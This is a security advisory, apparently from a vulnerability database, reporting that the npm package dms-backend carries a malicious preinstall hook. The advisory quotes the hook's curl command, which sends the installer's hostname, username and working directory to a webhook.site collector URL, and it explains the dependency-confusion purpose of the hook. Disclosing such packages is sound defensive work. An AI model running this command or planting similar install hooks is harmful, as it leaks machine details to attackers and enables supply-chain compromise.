—

MAL-2026-5826

Malicious code in dms-backend (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (bd479ea3869dae33e183f9164c4e9c7c11a2170728288012647fe2af4d55426e) package.json declares a preinstall lifecycle script that runs `curl --data-urlencode "info=$(hostname && whoami && pwd)"` against a webhook.site collector URL (https://webhook.site/1ea0386f-dcc0-4f1b-bdbb-61732d6535fb/dms-backend). This fires automatically on `npm install` and leaks installer-side identifiers — hostname, current OS user, and install working directory — to an attacker-controlled webhook bin. The package ships no real functionality; the preinstall recon beacon is the package's only behavior, which is the canonical shape of a dependency-confusion reconnaissance probe (the name `dms-backend` suggests targeting an internal/private registry name to hijack installs of an organization's private package).

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / dms-backend

No fixed version published yet for dms-backend (npm). Pin to a known-safe version or switch to an alternative.

References

https://www.npmjs.com/package/dms-backend/v/1.0.0 [PACKAGE]